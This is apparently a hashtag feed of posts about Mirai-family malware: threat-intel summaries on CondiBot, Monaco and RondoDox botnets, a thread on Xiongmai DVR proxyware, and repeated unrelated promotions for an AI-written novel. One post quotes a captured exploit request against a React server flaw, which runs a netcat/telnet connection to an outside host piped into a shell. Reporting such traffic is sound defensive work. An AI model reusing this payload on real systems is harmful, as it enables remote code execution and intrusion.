Mirai Variant and Monaco Miner Campaign Targeting Linux Systems

Two malware strains are targeting Linux systems CondiBot an evolved Mirai botnet used for DDoS attacks and Monaco an SSH brute-force and cryptocurrency mining campaign.

Pulse ID: 69c1943ae53f9148f6f7f398
Pulse Link: https://otx.alienvault.com/pulse/69c1943ae53f9148f6f7f398
Pulse Author: cryptocti
Created: 2026-03-23 19:27:54

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #DDoS #DoS #InfoSec #Linux #Malware #Mirai #OTX #OpenThreatExchange #RCE #SSH #bot #botnet #cryptocurrency #cryptocti

哲学に扱かれた
汝、哲学の金槌を頭に
振り下ろされる覚悟は宜しくて？

https://www.deviantart.com/deadly-poison-0/art/Tetsu-gaku-ni-Shigokareta-jp-1253818934

<>

#ＡＩ小説 #hiru_yasumi #shukuzu #bentou #kakomu #djugyou #yoshuu #gamen #mirai #kibou #takusu #kousha #kioku #netto #koufun #yousu #kagayaku #koukoku #gazou #miru #hitomi #kaiwa #daihyou #kinou #kimatsu #tesuto

Філософська прочуханка
Чи готові ви до того, щоб молот філософії
обрушився на вашу голову?

https://www.deviantart.com/deadly-poison-0/art/Tetsu-gaku-ni-Shigokareta-ua-1253819448

<>

#ＡＩ小説 #hiru_yasumi #shukuzu #bentou #kakomu #djugyou #yoshuu #gamen #mirai #kibou #takusu #kousha #kioku #netto #koufun #yousu #kagayaku #koukoku #gazou #miru #hitomi #kaiwa #daihyou #kinou #kimatsu #tesuto

哲学に扱かれた
汝、哲学の金槌を頭に
振り下ろされる覚悟は宜しくて？

https://www.pixiv.net/novel/show.php?id=26223699

<>

#ＡＩ小説 #hiru_yasumi #shukuzu #bentou #kakomu #djugyou #yoshuu #gamen #mirai #kibou #takusu #kousha #kioku #netto #koufun #yousu #kagayaku #koukoku #gazou #miru #hitomi #kaiwa #daihyou #kinou #kimatsu #tesuto

Філософська прочуханка
Чи готові ви до того, щоб молот філософії
обрушився на вашу голову?

https://www.pixiv.net/novel/show.php?id=26223706

<>

#ＡＩ小説 #hiru_yasumi #shukuzu #bentou #kakomu #djugyou #yoshuu #gamen #mirai #kibou #takusu #kousha #kioku #netto #koufun #yousu #kagayaku #koukoku #gazou #miru #hitomi #kaiwa #daihyou #kinou #kimatsu #tesuto

Excellent work by @nicter_jp documenting a Xiongmai DVR campaign deploying residential proxy SDKs: https://blog.nicter.jp/2026/03/iot_proxyware/

We pulled the payloads and decompiled the chain.

The downloader is Mirai with all DDoS stripped out — repurposed as a vehicle for proxy monetization. It delivers two proxy SDKs: IPRoyal Pawns and PacketSDK, part of the IPIDEA network Google disrupted in January.

NICTER's IOC timeline tells the rest: PacketSDK v1.0.2 (original domains) → v1.0.6 (scrambled replacements) → v1.0.8.4 (single fallback) → not deployed. Every dispatch path is now NXDOMAIN.

A concrete view of Google's takedown continuing to have impact.

https://github.com/deepfield/public-research/blob/main/reports/2026-03-19-xiongmai-packetsdk-ipidea.md

#Mirai #IPIDEA #threatintel

92.118.39[.]30 is trying to exploit #react2shell with the POST:
0={"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var+res=process.mainModule.require('child_process').execSync('(nc+45.135.194[.]27+3443+||+telnet+45.135.194[.]27+3443+||+busybox+nc+45.135.194[.]27+3443)+|+sh').toString().trim();;throw+Object.assign(new+Error('NEXT_REDIRECT'),{digest:+`NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}&1="$@0"&2=[]"

Netcat is used to trigger a #mirai downloader. Is interesting that the script atempts to kill a process using /var/Sofia (??)

#bot #malware #dfir

哲学に扱かれた
汝、哲学の金槌を頭に
振り下ろされる覚悟は宜しくて？

https://note.com/deadly_poison_0/n/n000f6e433d23

<>

#ＡＩ小説 #hiru_yasumi #shukuzu #bentou #kakomu #djugyou #yoshuu #gamen #mirai #kibou #takusu #kousha #kioku #netto #koufun #yousu #kagayaku #koukoku #gazou #miru #hitomi #kaiwa #daihyou #kinou #kimatsu #tesuto

Філософська прочуханка
Чи готові ви до того, щоб молот філософії
обрушився на вашу голову?

https://note.com/deadly_poison_0/n/n40c583137814

<>

#ＡＩ小説 #hiru_yasumi #shukuzu #bentou #kakomu #djugyou #yoshuu #gamen #mirai #kibou #takusu #kousha #kioku #netto #koufun #yousu #kagayaku #koukoku #gazou #miru #hitomi #kaiwa #daihyou #kinou #kimatsu #tesuto

RondoDox Botnet: From Zero to 174 Exploited Vulnerabilities

The RondoDox botnet has emerged as a significant threat, exploiting 174 different vulnerabilities since May 2025. It primarily targets IoT devices and internet-exposed services for DoS attacks. The botnet's infrastructure includes exploiting and hosting components, with evidence suggesting the use of compromised residential IPs. RondoDox's operators have shown a rapid adoption of newly disclosed vulnerabilities, sometimes exploiting them within days of publication. The botnet's evolution includes a shift from a shotgun approach using numerous exploits to a more focused strategy targeting recent, critical vulnerabilities. The malware shares similarities with Mirai but focuses solely on DoS attacks. This threat highlights the importance of exposure management in cybersecurity.

Pulse ID: 69b18f0dc8f031c3594cfcc9
Pulse Link: https://otx.alienvault.com/pulse/69b18f0dc8f031c3594cfcc9
Pulse Author: AlienVault
Created: 2026-03-11 15:49:33

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #DoS #InfoSec #IoT #Malware #Mirai #OTX #OpenThreatExchange #RAT #bot #botnet #AlienVault